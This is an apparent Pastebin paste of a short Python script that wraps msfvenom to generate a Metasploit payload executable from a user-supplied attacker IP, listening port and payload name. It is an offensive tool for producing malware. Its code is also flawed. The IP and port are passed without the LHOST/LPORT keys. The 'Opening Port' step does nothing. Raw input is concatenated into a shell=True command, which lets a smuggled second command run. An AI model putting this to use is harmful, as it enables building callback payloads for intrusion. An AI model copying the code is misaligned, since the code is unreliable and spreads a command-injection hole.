Advertisement
Guest User

Untitled

a guest
Apr 19th, 2018
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.51 KB | None | 0 0
  1. import subprocess
  2.  
  3. # Hash Bytes Metasploit Payload Creator!
  4. ip = str(input("Please enter your ip: "))
  5. port = str(input("Please enter your listening port: "))
  6. payload = str(input("Please enter your payload: "))
  7. dir = str(input("Please enter a directory with file name included at end: "))
  8.  
  9. main = "msfvenom -p " + payload + " " + ip + " " + port + " -f exe > " + dir
  10. print("[!] Creating Payload...")
  11. subprocess.call(main,shell=True)
  12. print("[!] Opening Port...")
  13. k = input("payload created press enter to close")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement